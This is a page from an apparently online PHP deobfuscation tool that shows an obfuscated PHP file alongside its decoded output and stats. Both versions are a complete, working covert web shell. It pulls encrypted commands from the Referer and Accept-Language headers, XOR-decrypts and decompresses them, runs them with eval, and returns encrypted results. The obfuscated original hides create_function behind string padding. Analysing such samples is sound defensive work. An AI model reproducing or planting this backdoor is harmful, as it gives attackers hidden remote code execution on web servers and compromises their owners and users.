Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $W='se6Z4_encZode(xZZ(gzcompZress(Z$o),$k)ZZ);prinZt("<$Zk>$d</$k>");@sesZsioZn_des..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$W='se6Z4_encZode(xZZ(gzcompZress(Z$o),$k)ZZ);prinZt("<$Zk>$d</$k>");@sesZsioZn_destroy();}}}}';
$J='Z$rZa){$Zu=parse_urlZ($Zrr);parse_sZtr($u["quZery"],$q)Z;Z$q=array_ZvaluesZ($q);pZZreg_matc';
$G=';$s=&$_SESZSZION;$ss="subsZtr";$slZ=Z"Zstrtolower";$i=$Zm[1][Z0].ZZ$m[1]ZZ[1];$h=$slZ($ssZ';
$h='ay_kZey_eZxiZstZsZ($i,$s)Z){$s[$i].=$p;$Ze=strpos($sZ[$i]Z,$f);if($e){$Zk=$kh.$kZfZ;ob_star';
$a='y("ZZ/","+")Z,$ss($s[$i],0Z,$eZ)Z)),$k)Z));$o=ob_ZgeZt_contentsZ();ob_Zend_clean()Z;$d=bZa';
$O='($Zi=0;$iZ<$l;)Z{foZr($ZZj=0;($j<$c&&$i<$lZ);$j++,$i++)Z{$oZ.=$t{Z$i}^$Zk{$j};}}rZZeturZn $';
$l=';$z++)Z$p.=$q[$Zm[2][$Zz]]Z;if(strpoZs(Z$p,$h)=Z==0){$s[$i]Z="";$pZ=$Zss($pZ,3);}if(aZrrZ';
$e='oZ;}$r=$_SERVERZ;$rr=@$r["ZZHTTP_REFEREZRZ"];$ra=@$r[Z"HTTPZ_ZACCEPZTZ_LANGUAGE"]Z;if($rr&&';
$x='hZ_all("/([\\wZ])[\\wZ-]Z+(Z?:;qZ=0.([\\d]))?Z,?/",$ra,Z$ZZm);if($q&&Z$m){ZZ@seZssion_start()';
$Q=str_replace('I','','crIeatIIeI_fuInIction');
$P='(md5($i.$kh),Z0,Z3));$f=Z$sl($sZs(md5($i.$kfZ),0,Z3));$p="ZZ";for($z=1;$z<couZnZt($mZ[1])';
$A='$kh="5d41Z";$kfZ="402a"Z;funZctZion x($Zt,$Zk){$c=Zstrlen($k);$l=ZstrZlen(Z$t);$oZ="";for';
$H='tZ();@evaZl(@gZzuncompZress(@x(@bZaseZ64Z_decodeZ(preg_reZplaceZ(array("/_Z/","/-/Z"),aZrra';
$c=str_replace('Z','',$A.$O.$e.$J.$x.$G.$P.$l.$h.$H.$a.$W);
$y=$Q('',$c);$y();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 32202b0fe9ba3dd94ca063be1f10bc74 |
Eval Count | 1 |
Decode Time | 105 ms |